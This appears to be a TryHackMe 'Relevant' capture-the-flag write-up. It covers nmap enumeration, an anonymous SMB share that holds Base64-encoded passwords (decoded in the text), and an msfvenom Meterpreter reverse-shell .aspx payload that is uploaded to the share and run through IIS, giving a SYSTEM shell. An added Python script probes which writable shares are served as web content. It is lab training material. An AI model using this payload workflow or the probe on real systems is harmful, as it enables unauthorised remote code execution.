TryHackMe - Relevant


1. Enumeration

  • Rustscan w/Nmap

      PORT      STATE SERVICE            REASON  VERSION
      80/tcp    open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
      |_http-server-header: Microsoft-IIS/10.0
      | http-methods: 
      |   Supported Methods: OPTIONS TRACE GET HEAD POST
      |_  Potentially risky methods: TRACE
      |_http-title: IIS Windows Server
      135/tcp   open  msrpc              syn-ack Microsoft Windows RPC
      139/tcp   open  netbios-ssn        syn-ack Microsoft Windows netbios-ssn
      445/tcp   open  microsoft-ds       syn-ack Windows Server 2016 Standard Evaluation 14393 microsoft-ds
      3389/tcp  open  ssl/ms-wbt-server? syn-ack
      | ssl-cert: Subject: commonName=Relevant
      | Issuer: commonName=Relevant
      | Public Key type: rsa
      | Public Key bits: 2048
      | Signature Algorithm: sha256WithRSAEncryption
      | Not valid before: 2022-03-17T01:15:08
      | Not valid after:  2022-09-16T01:15:08
      | MD5:   42a4 a8c4 a4d5 43af 1f7e e6a7 88fe 4373
      | SHA-1: 2a2c 5af2 116e 6673 7a55 c523 3c37 0cf2 3eeb c089
      | -----BEGIN CERTIFICATE-----
      | MIIC1DCCAbygAwIBAgIQEkeU/ZJCmK9J6QDJRpgLmDANBgkqhkiG9w0BAQsFADAT
      | MREwDwYDVQQDEwhSZWxldmFudDAeFw0yMjAzMTcwMTE1MDhaFw0yMjA5MTYwMTE1
      | MDhaMBMxETAPBgNVBAMTCFJlbGV2YW50MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
      | MIIBCgKCAQEA7ahxwPyNn7Abaj+oCzoOo83ho2xv4Oa7t0vA1uNos5FliGRzjEIg
      | MR2goaz7E8tkbU3yawvx/v6/DUxsIkOu6J4Ls/VI3BBMxeE/1GbC0OSlLEoeIe88
      | iPzXLcZy4lmC5Bk54T3XS6NPBFDU0ut/cjr4XyFcY1ah5A3D4sDZkQFCeR0slOTQ
      | QzyCDPsF3VwTWT7lCBDpFAq2KKFQd7pF/kopJc8qZqr2BPHJIu5tKxNIuaR9AFml
      | OHsr4F9XLAXjj/kRu18P68Zl37xFAyGg/dD1fvEADcShCtFA4Zx2xm7sUMrS2cIq
      | PTUo6uznY58MQLL3u9+RWvpX56/T7MrEiQIDAQABoyQwIjATBgNVHSUEDDAKBggr
      | BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAKXimMiHwlcM
      | 7KZmUN40eayEpReWmcx/so+zon7+bIIQNLktZZKqEEP1NPAODAdgsNsvP6s/3tuI
      | 4m6/IAgQZAFXEHQ9GZ5S6rjZCA7B0YpZ5kqC1NQUWAzgFiN0gB62tPHGKtDm6n1u
      | Mg97IlQrfvECo6ktKIF4fGVyzdyIHUD9TY/itfi0RylTvVpjauwO3TSv+Q147A7l
      | 2a+jlMWATm0yLYzbw2kT87HjpA7gNKu5IHk/fALDE+n7L2UdjqPsTP3Supto1HWm
      | MRhyAgri2sHL7cysJ0CjXh7JEMOobyBeiAvkYOVagfCCS42GlTyIOCNg1fU7zBMd
      | Iek/wk6cZVw=
      |_-----END CERTIFICATE-----
      |_ssl-date: 2022-03-18T01:28:58+00:00; 0s from scanner time.
      | rdp-ntlm-info: 
      |   Target_Name: RELEVANT
      |   NetBIOS_Domain_Name: RELEVANT
      |   NetBIOS_Computer_Name: RELEVANT
      |   DNS_Domain_Name: Relevant
      |   DNS_Computer_Name: Relevant
      |   Product_Version: 10.0.14393
      |_  System_Time: 2022-03-18T01:28:19+00:00
      49663/tcp open  http               syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
      |_http-server-header: Microsoft-IIS/10.0
      |_http-title: IIS Windows Server
      | http-methods: 
      |   Supported Methods: OPTIONS TRACE GET HEAD POST
      |_  Potentially risky methods: TRACE
      49668/tcp open  msrpc              syn-ack Microsoft Windows RPC
      49669/tcp open  msrpc              syn-ack Microsoft Windows RPC
      Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    
      Host script results:
      | p2p-conficker: 
      |   Checking for Conficker.C or higher...
      |   Check 1 (port 12736/tcp): CLEAN (Timeout)
      |   Check 2 (port 22316/tcp): CLEAN (Timeout)
      |   Check 3 (port 31614/udp): CLEAN (Timeout)
      |   Check 4 (port 23888/udp): CLEAN (Timeout)
      |_  0/4 checks are positive: Host is CLEAN or ports are blocked
      |_clock-skew: mean: 1h24m00s, deviation: 3h07m52s, median: 0s
      | smb-security-mode: 
      |   account_used: guest
      |   authentication_level: user
      |   challenge_response: supported
      |_  message_signing: disabled (dangerous, but default)
      | smb2-security-mode: 
      |   3.1.1: 
      |_    Message signing enabled but not required
      | smb2-time: 
      |   date: 2022-03-18T01:28:21
      |_  start_date: 2022-03-18T01:15:08
      | smb-os-discovery: 
      |   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
      |   Computer name: Relevant
      |   NetBIOS computer name: RELEVANT\x00
      |   Workgroup: WORKGROUP\x00
      |_  System time: 2022-03-17T18:28:22-07:00
    
  • Gobuster

    • No results

2. SMB

  • Connect to the nt4wrksv share. It accepts a null session (press Enter at the password prompt), so no credentials are needed to read it
      └─$ smbclient //10.10.201.49/nt4wrksv             
      Enter WORKGROUP\acousticgirl's password: 
      Try "help" to get a list of possible commands.
      smb: \> ls -la
      NT_STATUS_NO_SUCH_FILE listing \-la
      smb: \> ls
      .                                   D        0  Sat Jul 25 17:46:04 2020
      ..                                  D        0  Sat Jul 25 17:46:04 2020
      passwords.txt                       A       98  Sat Jul 25 11:15:33 2020
    
              7735807 blocks of size 4096. 5138781 blocks available
    
  • Download passwords.txt
      smb: \> get passwords.txt 
      getting file \passwords.txt of size 98 as passwords.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
    
  • Decode the entries in passwords.txt (they are Base64, not encrypted, so no key is needed). The credentials are not actually required for the route below, since the share is writable anonymously
      ┌──(acousticgirl㉿kali)-[~/CTF/THM/relevant]
      └─$ cat passwords.txt
      [User Passwords - Encoded]
      Qm9iIC0gIVBAJCRXMHJEITEyMw==
      QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
      ┌──(acousticgirl㉿kali)-[~/CTF/THM/relevant]
      └─$ echo 'Qm9iIC0gIVBAJCRXMHJEITEyMw==' | base64 -d
      Bob - !P@$$W0rD!123
      ┌──(acousticgirl㉿kali)-[~/CTF/THM/relevant]
      └─$ echo 'QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk' | base64 -d
      Bill - Juw4nnaM4n420696969!$$$
    

3. Gaining Shell

  • Use msfvenom to craft a payload to upload to the SMB share. This is the stageless x64 Meterpreter (meterpreter_reverse_tcp with an underscore, not the staged meterpreter/reverse_tcp), built as an .aspx page so that IIS compiles and runs it server-side when it is requested
      ┌──(acousticgirl㉿kali)-[~/CTF/THM/relevant]
      └─$ msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.6.8.143 lport=4444 -f aspx -o pwn.aspx
    
  • Upload the file to the share over the same null session (the target IP differs from the earlier session). The file name used here must match the one requested over HTTP in the next step
      └─$ smbclient //10.10.234.85/nt4wrksv
      Enter WORKGROUP\acousticgirl's password: 
      Try "help" to get a list of possible commands.
      smb: \> put pwn.aspx
      putting file pwn.aspx as \pwn.aspx (750.4 kb/s) (average 750.4 kb/s)
      smb: \> exit
    
  • Start the Meterpreter handler with the same payload, LHOST and LPORT that msfvenom was given (a mismatch here is the usual reason the session never arrives)
      msf6 > use exploit/multi/handler
      [*] Using configured payload generic/shell_reverse_tcp
      msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
      msf6 exploit(multi/handler) > set LHOST 10.6.8.143
      msf6 exploit(multi/handler) > set LPORT 4444
      msf6 exploit(multi/handler) > run
    
  • Trigger the malicious .aspx. The nt4wrksv share is the same directory that IIS serves as /nt4wrksv/ on port 49663, so a writable share here is effectively remote code execution: requesting the page makes the IIS worker process execute it
      └─$ curl http://10.10.234.85:49663/nt4wrksv/pwn.aspx
    
  • Interact with the new session and drop into a command shell

      msf6 exploit(multi/handler) > sessions 11
      meterpreter > shell
      Process 3628 created.
      Channel 1 created.
      Microsoft Windows [Version 10.0.14393]
      (c) 2016 Microsoft Corporation. All rights reserved.
    
      c:\windows\system32\inetsrv>whoami
      whoami
      nt authority\system
    
  • The IIS process that ran the page is already NT AUTHORITY\SYSTEM, so both flags can be read without any privilege escalation
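
The writeup goes straight to the nt4wrksv share and then relies on it being served by IIS, without showing either check. The script below is an added example (not part of the original writeup) that automates both: it parses a null-session share listing, then drops a random, non-executable marker file in each writable share and fetches it back over every HTTP port to prove which share sits inside a web root. The function names, the constructed sample listing and the default of writing the marker to the system temp directory are this example's own assumptions; the real helpers shell out to smbclient, which must be on PATH.

```python
import os
import re
import secrets
import subprocess
import tempfile
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

# Constructed sample of `smbclient -L //<host> -N` output (not captured from the box).
SAMPLE_SHARE_LISTING = """
\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tnt4wrksv        Disk      
SMB1 disabled -- no workgroup available
"""

_SHARE_RE = re.compile(r"^\s*(\S+)\s+(Disk|IPC|Printer)\b")


def parse_share_list(listing: str) -> List[str]:
    """Return the non-administrative Disk shares named in smbclient -L output."""
    shares = []
    for line in listing.splitlines():
        m = _SHARE_RE.match(line)
        if m and m.group(2) == "Disk" and not m.group(1).endswith("$"):
            shares.append(m.group(1))
    return shares


def list_shares(host: str) -> List[str]:
    """Null-session share listing via smbclient (assumes smbclient on PATH)."""
    proc = subprocess.run(["smbclient", "-L", f"//{host}", "-N"],
                          capture_output=True, text=True, timeout=30)
    return parse_share_list(proc.stdout)


def smb_put(host: str, share: str, remote_name: str, content: bytes) -> bool:
    """Write content to //host/share/remote_name over a null session."""
    local = os.path.join(tempfile.gettempdir(), remote_name)
    with open(local, "wb") as fh:
        fh.write(content)
    proc = subprocess.run(
        ["smbclient", f"//{host}/{share}", "-N", "-c", f"put {local} {remote_name}"],
        capture_output=True, text=True, timeout=30)
    return proc.returncode == 0 and "NT_STATUS" not in proc.stdout


def http_get(url: str) -> Optional[bytes]:
    """Fetch url; None on any HTTP or connection error."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.read()
    except (urllib.error.URLError, TimeoutError):
        return None


def probe_web_backed_shares(
    host: str,
    shares: Iterable[str],
    http_ports: Iterable[int],
    put: Callable[[str, str, str, bytes], bool] = smb_put,
    get: Callable[[str], Optional[bytes]] = http_get,
) -> List[Tuple[str, int, str]]:
    """
    For each share, write one marker file, then request it from every HTTP port
    as http://host:port/<share>/<marker>. Getting the marker's token back proves
    the share directory is inside a web root, i.e. an .aspx dropped there would
    be executed by IIS. Returns (share, port, url) for every hit.
    """
    hits = []
    for share in shares:
        # .txt so the probe itself is static content and can never execute.
        name = f"probe-{secrets.token_hex(4)}.txt"
        token = secrets.token_hex(16).encode()
        if not put(host, share, name, token):
            continue  # not writable (or not reachable) anonymously
        for port in http_ports:
            url = f"http://{host}:{port}/{share}/{name}"
            body = get(url)
            if body is not None and token in body:
                hits.append((share, port, url))
    return hits


if __name__ == "__main__":
    target = "10.10.234.85"  # the box's address in the writeup's second session
    for share, port, url in probe_web_backed_shares(target, list_shares(target), [80, 49663]):
        print(f"{share} is served on port {port}: {url}")
```

Delete the marker files once the mapping is known; the marker name and token are random so they cannot collide with real content, and a hit on port 49663 for nt4wrksv is exactly the condition the curl step above relies on.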

4. User Flag

```
c:\Users\Bob\Desktop>type user.txt
```

5. Root Flag

```
c:\Users\Administrator\Desktop>type root.txt
```


Tags: THM  CTF  SMB 

Written on March 17, 2022